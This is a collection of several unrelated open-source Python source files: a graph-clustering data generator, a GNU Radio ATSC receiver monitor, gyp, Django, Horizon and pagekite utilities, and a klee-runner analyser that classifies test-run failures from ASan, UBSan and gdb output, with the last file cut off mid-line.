# --------------------------------------------------------------------- # Model 1 : Random Geometric Graph # Python script to generate data using model-1 and perform greedy pivot # algorithm. # # Note: All Indices, whatsoever, start from 0. # --------------------------------------------------------------------- import random import networkx as nx import numpy as np # --------------------------------------------------------------------- # Initalize parameters # --------------------------------------------------------------------- seed = 222 k = 5 # Number of cluster th = 0.3 # GRG threshold ni = 20 # Number of nodes per cluster n = ni*k # Total number of nodes p = 0.2 # Intra-cluster flipping probability q = 0.4 # Inter-cluster connected flipping probability epsilon = 0.05 # Inter-cluster disconnected flipping probability # --------------------------------------------------------------------- # Generate geometric random graph : gr # --------------------------------------------------------------------- random.seed(seed) np.random.seed(seed) gr = nx.random_geometric_graph(k,th,seed) # --------------------------------------------------------------------- # Generate inital connected graph : g0 # --------------------------------------------------------------------- g0 = nx.Graph() for i in range(k): nodeList = range(ni*i,ni*i+ni) edgeList = [(x,y) for x in nodeList for y in nodeList if x<y] g0.add_nodes_from(nodeList) g0.add_edges_from(edgeList) # --------------------------------------------------------------------- # Generate final graph after flipping : gf # --------------------------------------------------------------------- nodeList = g0.nodes() edgeList = [(x,y) for x in nodeList for y in nodeList if x<y] gf = g0.copy() for e in edgeList: # Both vertices in same cluster if int(e[0]/ni)==int(e[1]/ni): if np.random.binomial(1,p): gf.remove_edge(e[0],e[1]) # Both vertices in diff cluster and connected in gr elif gr.has_edge(e[0],e[1]): if np.random.binomial(1,q): gf.add_edge(e[0],e[1]) # Both vertices in diff cluster and not-connected in gr else: if np.random.binomial(1,epsilon): gf.add_edge(e[0],e[1]) # --------------------------------------------------------------------- # Write the data # --------------------------------------------------------------------- fid = open('./data/data_randomGeomModel.txt', 'w') fid.write('# First Line : n p q epsilon\n') fid.write('# Following Lines : groundTruthClusterID vertexID listOfNeighbours\n') fid.write('{} {} {} {}'.format(n,p,q,epsilon)) for v in gf.nodes_iter(): fid.write('\n{} {}'.format(int(v/ni),v)) for i in gf.neighbors(v): fid.write(' {}'.format(i)) fid.close() # --------------------------------------------------------------------- def pivot_algorithm (gOriginal): # --------------------------------------------------------------------- # This algorithm is the CC-Pivot (Greedy Algorithm) Algorithm suggested # Ailon et. al. [STOC 2005] and again mentioned in Elsner et. al. [2009]. # For edges with signs +/- and minimization objective, this algorithm # is 3OPT. While for weighted edges, with w_ij^+ + w_ij^- = 1, this # algorithm is 5OPT. # # This function takes a graph g which is of the form networkx.Graph() # and returns the clustering labels for each node with attribute key as # 'clusterId'. # # This is tail recursion implementation of algorithm formatted in the # form of loop, till nodes() become empty in temporary graph. clusterId = 100 gNew = gOriginal.copy() while gNew.nodes(): pivot = gNew.nodes()[random.randint(0,len(gNew.nodes())-1)] gOriginal.node[pivot]['clusterId'] = clusterId for v in gNew.neighbors(pivot): gOriginal.node[v]['clusterId'] = clusterId gNew.remove_nodes_from(gNew.neighbors(pivot)) gNew.remove_node(pivot) clusterId = clusterId + 1 # --------------------------------------------------------------------- # Run Greedy and save output to file # --------------------------------------------------------------------- pivot_algorithm(gf) fid = open('./data/solution_randomGeomModel.txt', 'w') fid.write('# Note: GroundTruthClusterID ObtainedClusterID dont correspond, they just denote grouping of nodes.\n') fid.write('Node GroundTruthClusterID ObtainedClusterID') for v in gf.nodes_iter(): fid.write('\n{} {} {}'.format(v,int(v/ni),gf.node[v]['clusterId'])) fid.close()
gpl-2.0
bastibl/gnuradio
gr-dtv/examples/atsc_ctrlport_monitor.py
7
6277
#!/usr/bin/env python # # Copyright 2015 Free Software Foundation # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 3, or (at your option) # any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; see the file COPYING. If not, write to # the Free Software Foundation, Inc., 51 Franklin Street, # Boston, MA 02110-1301, USA. # from __future__ import print_function from __future__ import division from __future__ import unicode_literals import sys import matplotlib matplotlib.use("QT4Agg") import matplotlib.pyplot as plt import matplotlib.animation as animation from gnuradio.ctrlport.GNURadioControlPortClient import ( GNURadioControlPortClient, TTransportException, ) import numpy from numpy.fft import fftpack """ If a host is running the ATSC receiver chain with ControlPort turned on, this script will connect to the host using the hostname and port pair of the ControlPort instance and display metrics of the receiver. The ATSC publishes information about the success of the Reed-Solomon decoder and Viterbi metrics for use here in displaying the link quality. This also gets the equalizer taps of the receiver and displays the frequency response. """ class atsc_ctrlport_monitor(object): def __init__(self, host, port): argv = [None, host, port] radiosys = GNURadioControlPortClient(argv=argv, rpcmethod='thrift') self.radio = radiosys.client print(self.radio) vt_init_key = 'dtv_atsc_viterbi_decoder0::decoder_metrics' data = self.radio.getKnobs([vt_init_key])[vt_init_key] init_metric = numpy.mean(data.value) self._viterbi_metric = 100*[init_metric,] table_col_labels = ('Num Packets', 'Error Rate', 'Packet Error Rate', 'Viterbi Metric', 'SNR') self._fig = plt.figure(1, figsize=(12,12), facecolor='w') self._sp0 = self._fig.add_subplot(4,1,1) self._sp1 = self._fig.add_subplot(4,1,2) self._sp2 = self._fig.add_subplot(4,1,3) self._plot_taps = self._sp0.plot([], [], 'k', linewidth=2) self._plot_psd = self._sp1.plot([], [], 'k', linewidth=2) self._plot_data = self._sp2.plot([], [], 'ok', linewidth=2, markersize=4, alpha=0.05) self._ax2 = self._fig.add_subplot(4,1,4) self._table = self._ax2.table(cellText=[len(table_col_labels)*['0']], colLabels=table_col_labels, loc='center') self._ax2.axis('off') cells = self._table.properties()['child_artists'] for c in cells: c.set_lw(0.1) # set's line width c.set_ls('solid') c.set_height(0.2) ani = animation.FuncAnimation(self._fig, self.update_data, frames=200, fargs=(self._plot_taps[0], self._plot_psd[0], self._plot_data[0], self._table), init_func=self.init_function, blit=True) plt.show() def update_data(self, x, taps, psd, syms, table): try: eqdata_key = 'dtv_atsc_equalizer0::taps' symdata_key = 'dtv_atsc_equalizer0::data' rs_nump_key = 'dtv_atsc_rs_decoder0::num_packets' rs_numbp_key = 'dtv_atsc_rs_decoder0::num_bad_packets' rs_numerrs_key = 'dtv_atsc_rs_decoder0::num_errors_corrected' vt_metrics_key = 'dtv_atsc_viterbi_decoder0::decoder_metrics' snr_key = 'probe2_f0::SNR' data = self.radio.getKnobs([]) eqdata = data[eqdata_key] symdata = data[symdata_key] rs_num_packets = data[rs_nump_key] rs_num_bad_packets = data[rs_numbp_key] rs_num_errors_corrected = data[rs_numerrs_key] vt_decoder_metrics = data[vt_metrics_key] snr_est = data[snr_key] vt_decoder_metrics = numpy.mean(vt_decoder_metrics.value) self._viterbi_metric.pop() self._viterbi_metric.insert(0, vt_decoder_metrics) except TTransportException: sys.stderr.write("Lost connection, exiting") sys.exit(1) ntaps = len(eqdata.value) taps.set_ydata(eqdata.value) taps.set_xdata(list(range(ntaps))) self._sp0.set_xlim(0, ntaps) self._sp0.set_ylim(min(eqdata.value), max(eqdata.value)) fs = 6.25e6 freq = numpy.linspace(-fs / 2, fs / 2, 10000) H = numpy.fft.fftshift(fftpack.fft(eqdata.value, 10000)) HdB = 20.0*numpy.log10(abs(H)) psd.set_ydata(HdB) psd.set_xdata(freq) self._sp1.set_xlim(0, fs / 2) self._sp1.set_ylim([min(HdB), max(HdB)]) self._sp1.set_yticks([min(HdB), max(HdB)]) self._sp1.set_yticklabels(["min", "max"]) nsyms = len(symdata.value) syms.set_ydata(symdata.value) syms.set_xdata(nsyms*[0,]) self._sp2.set_xlim([-1, 1]) self._sp2.set_ylim([-10, 10]) per = float(rs_num_bad_packets.value) / float(rs_num_packets.value) ber = float(rs_num_errors_corrected.value) / float(187*rs_num_packets.value) table._cells[(1,0)]._text.set_text("{0}".format(rs_num_packets.value)) table._cells[(1,1)]._text.set_text("{0:.2g}".format(ber)) table._cells[(1,2)]._text.set_text("{0:.2g}".format(per)) table._cells[(1,3)]._text.set_text("{0:.1f}".format(numpy.mean(self._viterbi_metric))) table._cells[(1,4)]._text.set_text("{0:.4f}".format(snr_est.value[0])) return (taps, psd, syms, table) def init_function(self): return self._plot_taps + self._plot_psd + self._plot_data if __name__ == "__main__": host = sys.argv[1] port = sys.argv[2] m = atsc_ctrlport_monitor(host, port)
gpl-3.0
hkernbach/arangodb
3rdParty/V8/v5.7.492.77/tools/gyp/pylib/gyp/MSVSToolFile.py
2736
1804
# Copyright (c) 2012 Google Inc. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """Visual Studio project reader/writer.""" import gyp.common import gyp.easy_xml as easy_xml class Writer(object): """Visual Studio XML tool file writer.""" def __init__(self, tool_file_path, name): """Initializes the tool file. Args: tool_file_path: Path to the tool file. name: Name of the tool file. """ self.tool_file_path = tool_file_path self.name = name self.rules_section = ['Rules'] def AddCustomBuildRule(self, name, cmd, description, additional_dependencies, outputs, extensions): """Adds a rule to the tool file. Args: name: Name of the rule. description: Description of the rule. cmd: Command line of the rule. additional_dependencies: other files which may trigger the rule. outputs: outputs of the rule. extensions: extensions handled by the rule. """ rule = ['CustomBuildRule', {'Name': name, 'ExecutionDescription': description, 'CommandLine': cmd, 'Outputs': ';'.join(outputs), 'FileExtensions': ';'.join(extensions), 'AdditionalDependencies': ';'.join(additional_dependencies) }] self.rules_section.append(rule) def WriteIfChanged(self): """Writes the tool file.""" content = ['VisualStudioToolFile', {'Version': '8.00', 'Name': self.name }, self.rules_section ] easy_xml.WriteXmlIfChanged(content, self.tool_file_path, encoding="Windows-1252")
apache-2.0
undoware/neutron-drive
google_appengine/lib/django_1_3/django/core/management/commands/startapp.py
321
1909
import os from django.core.management.base import copy_helper, CommandError, LabelCommand from django.utils.importlib import import_module class Command(LabelCommand): help = "Creates a Django app directory structure for the given app name in the current directory." args = "[appname]" label = 'application name' requires_model_validation = False # Can't import settings during this command, because they haven't # necessarily been created. can_import_settings = False def handle_label(self, app_name, directory=None, **options): if directory is None: directory = os.getcwd() # Determine the project_name by using the basename of directory, # which should be the full path of the project directory (or the # current directory if no directory was passed). project_name = os.path.basename(directory) if app_name == project_name: raise CommandError("You cannot create an app with the same name" " (%r) as your project." % app_name) # Check that the app_name cannot be imported. try: import_module(app_name) except ImportError: pass else: raise CommandError("%r conflicts with the name of an existing Python module and cannot be used as an app name. Please try another name." % app_name) copy_helper(self.style, 'app', app_name, directory, project_name) class ProjectCommand(Command): help = ("Creates a Django app directory structure for the given app name" " in this project's directory.") def __init__(self, project_directory): super(ProjectCommand, self).__init__() self.project_directory = project_directory def handle_label(self, app_name, **options): super(ProjectCommand, self).handle_label(app_name, self.project_directory, **options)
bsd-3-clause
newrocknj/horizon
openstack_dashboard/views.py
50
1395
# Copyright 2012 Nebula, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from django import shortcuts import django.views.decorators.vary import horizon from horizon import base from horizon import exceptions def get_user_home(user): dashboard = None if user.is_superuser: try: dashboard = horizon.get_dashboard('admin') except base.NotRegistered: pass if dashboard is None: dashboard = horizon.get_default_dashboard() return dashboard.get_absolute_url() @django.views.decorators.vary.vary_on_cookie def splash(request): if not request.user.is_authenticated(): raise exceptions.NotAuthenticated() response = shortcuts.redirect(horizon.get_user_home(request.user)) if 'logout_reason' in request.COOKIES: response.delete_cookie('logout_reason') return response
apache-2.0
lyoshenka/PyPagekite
pagekite/yamond.py
2
5903
""" This is a class implementing a flexible metric-store and an HTTP thread for browsing the numbers. """ ############################################################################## LICENSE = """\ This file is part of pagekite.py. Copyright 2010-2013, the Beanstalks Project ehf. and Bjarni Runar Einarsson This program is free software: you can redistribute it and/or modify it under the terms of the GNU Affero General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Affero General Public License for more details. You should have received a copy of the GNU Affero General Public License along with this program. If not, see: <http://www.gnu.org/licenses/> """ ############################################################################## import getopt import os import random import re import select import socket import struct import sys import threading import time import traceback import urllib import BaseHTTPServer try: from urlparse import parse_qs, urlparse except Exception, e: from cgi import parse_qs from urlparse import urlparse class YamonRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler): def do_yamon_vars(self): self.send_response(200) self.send_header('Content-Type', 'text/plain') self.send_header('Cache-Control', 'no-cache') self.end_headers() self.wfile.write(self.server.yamond.render_vars_text()) def do_heapy(self): from guppy import hpy self.send_response(200) self.send_header('Content-Type', 'text/plain') self.send_header('Cache-Control', 'no-cache') self.end_headers() self.wfile.write(hpy().heap()) def do_404(self): self.send_response(404) self.send_header('Content-Type', 'text/html') self.end_headers() self.wfile.write('<h1>404: What? Where? Cannot find it!</h1>') def do_root(self): self.send_response(200) self.send_header('Content-Type', 'text/html') self.end_headers() self.wfile.write('<h1>Hello!</h1>') def handle_path(self, path, query): if path == '/vars.txt': self.do_yamon_vars() elif path == '/heap.txt': self.do_heapy() elif path == '/': self.do_root() else: self.do_404() def do_GET(self): (scheme, netloc, path, params, query, frag) = urlparse(self.path) qs = parse_qs(query) return self.handle_path(path, query) class YamonHttpServer(BaseHTTPServer.HTTPServer): def __init__(self, yamond, handler): BaseHTTPServer.HTTPServer.__init__(self, yamond.sspec, handler) self.yamond = yamond class YamonD(threading.Thread): """Handle HTTP in a separate thread.""" def __init__(self, sspec, server=YamonHttpServer, handler=YamonRequestHandler): threading.Thread.__init__(self) self.lock = threading.Lock() self.server = server self.handler = handler self.sspec = sspec self.httpd = None self.running = False self.values = {} self.lists = {} self.views = {} def vmax(self, var, value): try: self.lock.acquire() if value > self.values[var]: self.values[var] = value finally: self.lock.release() def vscale(self, var, ratio, add=0): try: self.lock.acquire() if var not in self.values: self.values[var] = 0 self.values[var] *= ratio self.values[var] += add finally: self.lock.release() def vset(self, var, value): try: self.lock.acquire() self.values[var] = value finally: self.lock.release() def vadd(self, var, value, wrap=None): try: self.lock.acquire() if var not in self.values: self.values[var] = 0 self.values[var] += value if wrap is not None and self.values[var] >= wrap: self.values[var] -= wrap finally: self.lock.release() def vmin(self, var, value): try: self.lock.acquire() if value < self.values[var]: self.values[var] = value finally: self.lock.release() def vdel(self, var): try: self.lock.acquire() if var in self.values: del self.values[var] finally: self.lock.release() def lcreate(self, listn, elems): try: self.lock.acquire() self.lists[listn] = [elems, 0, ['' for x in xrange(0, elems)]] finally: self.lock.release() def ladd(self, listn, value): try: self.lock.acquire() lst = self.lists[listn] lst[2][lst[1]] = value lst[1] += 1 lst[1] %= lst[0] finally: self.lock.release() def render_vars_text(self, view=None): if view: if view == 'heapy': from guppy import hpy return hpy().heap() else: values, lists = self.views[view] else: values, lists = self.values, self.lists data = [] for var in values: data.append('%s: %s\n' % (var, values[var])) for lname in lists: (elems, offset, lst) = lists[lname] l = lst[offset:] l.extend(lst[:offset]) data.append('%s: %s\n' % (lname, ' '.join(['%s' % (x, ) for x in l]))) data.sort() return ''.join(data) def quit(self): if self.httpd: self.running = False urllib.urlopen('http://%s:%s/exiting/' % self.sspec, proxies={}).readlines() def run(self): self.httpd = self.server(self, self.handler) self.sspec = self.httpd.server_address self.running = True while self.running: self.httpd.handle_request() if __name__ == '__main__': yd = YamonD(('', 0)) yd.vset('bjarni', 100) yd.lcreate('foo', 2) yd.ladd('foo', 1) yd.ladd('foo', 2) yd.ladd('foo', 3) yd.run()
agpl-3.0
delcypher/klee-runner
nativeanalysis/analyse.py
1
17995
# vim: set sw=4 ts=4 softtabstop=4 expandtab: from collections import namedtuple import logging import pprint import re _logger = logging.getLogger(__name__) # Possibe run outcomes SuccessfulExecution = namedtuple("SuccessfulExecution", ["msg"]) ASanError = namedtuple("ASanError", ["msg", "type", "stack_trace"]) UBSanError = namedtuple("UBSanError", ["msg", "type", "stack_trace"]) AssertError = namedtuple("AssertError", ["msg", "condition", "stack_trace"]) AbortError = namedtuple("AbortError", ["msg", "stack_trace"]) ArithmeticError = namedtuple("ArithmeticError", ["msg", "stack_trace"]) UnknownError = namedtuple("UnknownError", ["msg", "raw_result_info"]) TimeoutError = namedtuple("TimeoutError", ["msg"]) OutOfMemoryError = namedtuple("OutOfMemoryError", ["msg"]) LibKleeRunTestError = namedtuple("LibKleeRunTestError", ["msg", "type"]) LIB_KLEE_RUN_TEST_ERROR_MSG_RE = re.compile(r"KLEE_RUN_TEST_ERROR: (.+)$") def get_test_case_run_outcome(r): """ Get an outcome for a run of a test case `r` a raw result info dictionary """ assert isinstance(r, dict) # FIXME: Don't use raw form _logger.debug('Analysing:\n{}'.format(pprint.pformat(r))) invocation_info = r['invocation_info'] if r['backend_timeout']: return TimeoutError(msg='Timeout hit running "{}" with "{}"'.format( invocation_info['program'], invocation_info['ktest_file'])) if r['out_of_memory']: return OutOfMemoryError(msg='Memory limit hit running "{}" with "{}"'.format( invocation_info['program'], invocation_info['ktest_file'])) if r['exit_code'] == 0: return SuccessfulExecution(msg='') # Look for libkleeruntest errors if r['exit_code'] == 1: log_file = r['log_file'] _logger.debug('Opening log file "{}"'.format(log_file)) with open(log_file, 'r') as f: for l in f: libkleeruntest_error_match = LIB_KLEE_RUN_TEST_ERROR_MSG_RE.search(l) if libkleeruntest_error_match: type = libkleeruntest_error_match.group(1) failure = LibKleeRunTestError(msg=l.strip(), type=type) _logger.debug('Found LibkleeRuntest failure: {}'.format(failure)) return failure if invocation_info['attach_gdb']: return _get_outcome_attached_gdb(r) # Try for assert/abort without stacktrace (i.e. gdb was not attached) if r['exit_code'] == -6: # FIXME: This only works when using PythonPsUtil as the backend log_file = r['log_file'] _logger.debug('Opening log file "{}"'.format(log_file)) with open(log_file, 'r') as f: for l in f: assert_match = ASSERT_GDB_RE.search(l) if assert_match: # Looks like an assertion failure # FIXME: Parse the stack trace from gdb condition = assert_match.group(1) failure = AssertError(msg=l.strip(), condition=condition, stack_trace=None) _logger.debug('Found assertion failure: {}'.format(failure)) return failure # Assume it was an abort failure = AbortError(msg="most likely an abort", stack_trace=None) _logger.debug('Found abort failure: {}'.format(failure)) return failure # Try SIGFPE if r['exit_code'] == -8: failure = ArithmeticError(msg="Found SIGFPE", stack_trace=None) _logger.debug('Found arithmetic failure: {}'.format(failure)) return failure # Try ubsan/asan builds if 'misc' in invocation_info: if 'bug_replay_build_type' in invocation_info['misc']: bug_replay_build_type = invocation_info['misc']['bug_replay_build_type'] if bug_replay_build_type == 'ubsan': return _get_outcome_ubsan(r) elif bug_replay_build_type == 'asan': return _get_outcome_asan(r) # Unknown return UnknownError( msg='Could not identify exit of program with non-zero exit code', raw_result_info=r) ASSERT_GDB_RE = re.compile(r": Assertion `(.+)' failed.\s*$") ABORT_GDB_RE = re.compile(r"Program received signal SIGABRT") SIGFPE_GDB_RE = re.compile(r"Program received signal SIGFPE") # \1 function name # \2 library GDB_IN_FROM_STACKFRAME = re.compile(r"#\d+\s+([A-Za-z0-9_]+)\s+\(.*\)\s+from\s+(.+)") # \1 function name # \2 source file # \3 line number GDB_IN_AT_STACKFRAME = re.compile(r"#\d+\s+([A-Za-z0-9_]+)\s+\(.*\)\s+at\s+(.+):(\d+)") class StackFrame: def __init__(self, fn_name, lib=None, source_file=None, line_number=None): assert isinstance(fn_name, str) assert len(fn_name) > 0 if lib is not None: assert isinstance(lib, str) assert len(lib) > 0 else: assert isinstance(source_file, str) assert len(source_file) > 0 assert isinstance(line_number, int) assert line_number > 0 self.fn_name = fn_name self.lib = lib self.source_file = source_file self.line_number = line_number def __str__(self): msg = "StrackFrame(\"{}\", ".format(self.fn_name) if self.lib: msg += "lib=\"{}\")".format(self.lib) else: msg += "source_file=\"{}\", line_number={})".format(self.source_file, self.line_number) return msg def __repr__(self): return str(self) def _parse_gdb_stacktrace(f): in_stacktrace = False stacktrace = None for l in f: if l.startswith('#0'): in_stacktrace = True stacktrace = [] if not in_stacktrace: continue if not l.startswith('#'): in_stacktrace = False break m = GDB_IN_FROM_STACKFRAME.match(l) if m: frame = StackFrame(fn_name=m.group(1), lib=m.group(2)) stacktrace.append(frame) continue m = GDB_IN_AT_STACKFRAME.match(l) if m: frame = StackFrame( fn_name=m.group(1), lib=None, source_file=m.group(2), line_number=int(m.group(3)) ) stacktrace.append(frame) continue # Failed to parse stack frame _logger.error('Failed to parse "{}" from stacktrace'.format(l)) raise Exception('Failed to parse stacktrace') return None _logger.debug('Got stacktrace:\n{}'.format(pprint.pformat(stacktrace))) return stacktrace def _get_outcome_attached_gdb(r): assert isinstance(r, dict) # FIXME: Don't use raw form invocation_info = r['invocation_info'] assert invocation_info['attach_gdb'] assert r['exit_code'] != 0 # For now assume we are looking for abort and assertion failures log_file = r['log_file'] _logger.debug('Opening log file "{}"'.format(log_file)) with open(log_file, 'r') as f: # Walk through the lines trying to find assertion message # e.g. # non_terminating_klee_bug.x86_64: /home/user/fp-bench/benchmarks/c/imperial/synthetic/non-terminating/non-terminating.c:65: main: Assertion `false' failed. for l in f: assert_match = ASSERT_GDB_RE.search(l) if assert_match: # Looks like an assertion failure. Here's an example trace # ``` # sqrt_klee_bug.x86_64: /home/user/fp-bench/benchmarks/c/imperial/synthetic/sqrt/sqrt.c:80: main: Assertion `almost_equal(x, sqrt_x*sqrt_x)' failed. # # Program received signal SIGABRT, Aborted. # raise () from /usr/lib/libc.so.6 # #0 raise () from /usr/lib/libc.so.6 # #1 abort () from /usr/lib/libc.so.6 # #2 __assert_fail_base () from /usr/lib/libc.so.6 # #3 __assert_fail () from /usr/lib/libc.so.6 # #4 main (argc=<optimized out>, argv=<optimized out>) at /home/user/fp-bench/benchmarks/c/imperial/synthetic/sqrt/sqrt.c:80 # ``` condition = assert_match.group(1) failure = AssertError(msg=l.strip(), condition=condition, stack_trace=_parse_gdb_stacktrace(f)) _logger.debug('Found assertion failure: {}'.format(failure)) return failure # NOTE: Be careful. assert failures call abort so we are assuming # that an assertion error message will come first abort_match = ABORT_GDB_RE.search(l) if abort_match: # Looks like abort() was called. Here's an example trace # ``` # Program received signal SIGABRT, Aborted. # raise () from /usr/lib/libc.so.6 # #0 raise () from /usr/lib/libc.so.6 # #1 abort () from /usr/lib/libc.so.6 # #2 __gmp_invalid_operation () at /home/user/fp-bench/benchmarks/c/aachen/real/gmp/benchmarks/gmp-6.1.1/invalid.c:82 # #3 __gmpf_set_d (r=r@entry=, d=<optimized out>) at /home/user/fp-bench/benchmarks/c/aachen/real/gmp/benchmarks/gmp-6.1.1/mpf/set_d.c:45 # #4 main (argc=<optimized out>, argv=<optimized out>) at /home/user/fp-bench/benchmarks/c/aachen/real/gmp/benchmarks/main.c:100 # ``` failure = AbortError(msg=l.strip(), stack_trace=_parse_gdb_stacktrace(f)) _logger.debug('Found abort failure: {}'.format(failure)) return failure sigfpe_match = SIGFPE_GDB_RE.search(l) if sigfpe_match: failure = ArithmeticError(msg=l.strip(), stack_trace=_parse_gdb_stacktrace(f)) _logger.debug('Found abort failure: {}'.format(failure)) return failure raise Exception('GDB: unhandled case') # FIXME: The stacktrace for ASan and UBSan are the same # we probably ought to use the same parser UBSAN_START_STACKTRACE = re.compile(r"\s*#0") UBSAN_FRAME_STACKTRACE = re.compile(r"\s*#\d+") # \1 function name # \2 source file # \3 line number UBSAN_FRAME_SOURCE_STACKTRACE = re.compile(r"^\s*#\d+\s+.+\s+in\s+([A-Za-z0-9_]+)\s+(.+):(\d+)") # \1 function name # \2 library UBSAN_FRAME_LIB_STACKTRACE = re.compile(r"^\s*#\d+\s+.+\s+in\s+([A-Za-z0-9_]+)\s+\((.+)\+.+\)") def _parse_ubsan_stacktrace(f): """ Example stacktrace: ``` /home/user/fp-bench/benchmarks/c/aachen/real/gmp/benchmarks/gmp-6.1.1/errno.c:53:19: runtime error: division by zero #0 0x409a9c in __gmp_exception /home/user/fp-bench/benchmarks/c/aachen/real/gmp/benchmarks/gmp-6.1.1/errno.c:53 #1 0x409aad in __gmp_sqrt_of_negative /home/user/fp-bench/benchmarks/c/aachen/real/gmp/benchmarks/gmp-6.1.1/errno.c:64 #2 0x402364 in __gmpf_sqrt /home/user/fp-bench/benchmarks/c/aachen/real/gmp/benchmarks/gmp-6.1.1/mpf/sqrt.c:76 #3 0x401eab in main /home/user/fp-bench/benchmarks/c/aachen/real/gmp/benchmarks/main.c:96 #4 0x7fa818130290 in __libc_start_main (/usr/lib/libc.so.6+0x20290) #5 0x401ed9 in _start (/home/dsl11/dev/klee-afr/fp-bench/replay_ubsan_build/benchmarks/c/aachen/real/gmp/gmp_klee_inv_arg.x86_64+0x401ed9) ``` """ in_stacktrace = False stacktrace = None for l in f: _logger.debug('Examining "{}"'.format(l)) if not in_stacktrace and UBSAN_START_STACKTRACE.match(l): in_stacktrace = True stacktrace = [] if not in_stacktrace: _logger.debug('Not in stacktrace') continue if not UBSAN_FRAME_STACKTRACE.match(l): in_stacktrace = False break m = UBSAN_FRAME_LIB_STACKTRACE.match(l) if m: frame = StackFrame(fn_name=m.group(1), lib=m.group(2)) stacktrace.append(frame) continue m = UBSAN_FRAME_SOURCE_STACKTRACE.match(l) if m: frame = StackFrame( fn_name=m.group(1), lib=None, source_file=m.group(2), line_number=int(m.group(3)) ) stacktrace.append(frame) continue # Failed to parse stack frame _logger.error('Failed to parse "{}" from stacktrace'.format(l)) raise Exception('Failed to parse stacktrace') return None _logger.debug('Got stacktrace:\n{}'.format(pprint.pformat(stacktrace))) return stacktrace UBSAN_EXIT_CODE_RE = re.compile(r"exitcode=(\d+)") UBSAN_RUNTIME_ERROR_RE = re.compile(r"runtime error: (.+)$") def _get_outcome_ubsan(r): assert isinstance(r, dict) # FIXME: Don't use raw form assert r['exit_code'] != 0 invocation_info = r['invocation_info'] # Parse out the excepted exit code expected_exit_code = None if 'UBSAN_OPTIONS' in invocation_info['environment_variables']: ubsan_options = invocation_info['environment_variables']['UBSAN_OPTIONS'] exit_code_match = UBSAN_EXIT_CODE_RE.search(ubsan_options) if exit_code_match: expected_exit_code = int(exit_code_match.group(1)) if expected_exit_code != r['exit_code']: raise Exception('UBSan: Unhandled case') # Look for runtime error log_file = r['log_file'] _logger.debug('Opening log file "{}"'.format(log_file)) with open(log_file, 'r') as f: for l in f: runtime_error_match = UBSAN_RUNTIME_ERROR_RE.search(l) if runtime_error_match: type = runtime_error_match.group(1) failure = UBSanError(msg=l.strip(), type=type, stack_trace=_parse_ubsan_stacktrace(f)) _logger.debug('Found ubsan failure: {}'.format(failure)) return failure raise Exception('UBSan: Unhandled case') # FIXME: The stacktrace for ASan and UBSan are the same # we probably ought to use the same parser ASAN_START_STACKTRACE = re.compile(r"^\s*#0") ASAN_FRAME_STACKTRACE = re.compile(r"^\s*#\d+") # \1 function name # \2 source file # \3 line number ASAN_FRAME_SOURCE_STACKTRACE = re.compile(r"^\s*#\d+\s+.+\s+in\s+([A-Za-z0-9_]+)\s+(.+):(\d+)") # \1 function name # \2 library ASAN_FRAME_LIB_STACKTRACE = re.compile(r"^\s*#\d+\s+.+\s+in\s+([A-Za-z0-9_]+)\s+\((.+)\+.+\)") def _parse_asan_stacktrace(f): """ Example trace ``` ================================================================= ==8223==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fffdc76cf24 at pc 0x000000400c1d bp 0x7fffdc76cee0 sp 0x7fffdc76ced0 READ of size 4 at 0x7fffdc76cf24 thread T0 #0 0x400c1c in sum2 /home/user/fp-bench/benchmarks/c/imperial/synthetic/sum_is_commutative/sum_is_commutative.c:51 #1 0x400c1c in main /home/user/fp-bench/benchmarks/c/imperial/synthetic/sum_is_commutative/sum_is_commutative.c:72 #2 0x7f00accb1290 in __libc_start_main (/usr/lib/libc.so.6+0x20290) #3 0x400c89 in _start (/home/dsl11/dev/klee-afr/fp-bench/replay_asan_build/benchmarks/c/imperial/synthetic/sum_is_commutative_klee_float_bug.x86_64+0x400c89) Address 0x7fffdc76cf24 is located in stack of thread T0 at offset 52 in frame #0 0x4009bf in main /home/user/fp-bench/benchmarks/c/imperial/synthetic/sum_is_commutative/sum_is_commutative.c:59 ``` """ in_stacktrace = False stacktrace = None for l in f: _logger.debug('Examining "{}"'.format(l)) if not in_stacktrace and ASAN_START_STACKTRACE.match(l): in_stacktrace = True stacktrace = [] if not in_stacktrace: _logger.debug('Not in stacktrace') continue if not ASAN_FRAME_STACKTRACE.match(l): in_stacktrace = False break m = ASAN_FRAME_LIB_STACKTRACE.match(l) if m: frame = StackFrame(fn_name=m.group(1), lib=m.group(2)) stacktrace.append(frame) continue m = ASAN_FRAME_SOURCE_STACKTRACE.match(l) if m: frame = StackFrame( fn_name=m.group(1), lib=None, source_file=m.group(2), line_number=int(m.group(3)) ) stacktrace.append(frame) continue # Failed to parse stack frame _logger.error('Failed to parse "{}" from stacktrace'.format(l)) raise Exception('Failed to parse stacktrace') return None _logger.debug('Got stacktrace:\n{}'.format(pprint.pformat(stacktrace))) return stacktrace ASAN_EXIT_CODE_RE = re.compile(r"exitcode=(\d+)") ASAN_ERROR_MSG_RE = re.compile(r"AddressSanitizer: ([a-zA-z-]+)") def _get_outcome_asan(r): assert isinstance(r, dict) # FIXME: Don't use raw form assert r['exit_code'] != 0 invocation_info = r['invocation_info'] # Parse out the excepted exit code expected_exit_code = None if 'ASAN_OPTIONS' in invocation_info['environment_variables']: asan_options = invocation_info['environment_variables']['ASAN_OPTIONS'] exit_code_match = ASAN_EXIT_CODE_RE.search(asan_options) if exit_code_match: expected_exit_code = int(exit_code_match.group(1)) if expected_exit_code != r['exit_code']: raise Exception('ASan: Unhandled 